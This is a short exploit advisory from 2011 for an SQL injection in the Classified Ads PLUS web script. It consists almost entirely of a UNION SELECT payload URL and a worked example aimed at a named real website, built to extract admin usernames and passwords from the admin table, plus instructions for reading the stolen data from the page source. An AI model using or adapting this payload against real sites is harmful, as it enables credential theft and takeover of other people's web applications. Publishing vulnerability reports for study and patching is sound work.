#################################################################### [+] Exploit Title : Classified Ads PLUS Scripts [ Sql Injection Vulnerability] [+] Author : Egyptian.H4x0rz [+] Contact : SpY(at)Hotmail.Com [+] Date : 05-04-2011 [+] Software Link: http://www.softbizscripts.com/classified-ads-plus-script-features.php [+] category: Web Apps [SQli] [+] HomePage : Black-hat.cc #################################################################### Vulnerability: *SQL injection Vulnerability* [#] http://patch/gallery.php?provided=14&cid=-1+union+select+,[sqli],2,3,4,5 ~ [#] eXample http://trocavecmoi.com/gallery.php?provided=14&cid=-1+union+select+concat_ws(0x3a,id,admin_name,pwd),2,3,4,5+from+sbclassified_admin-- [#] to view result open page source and find "showcategory.php?cid=xxxxxxxxxx" ####################################################################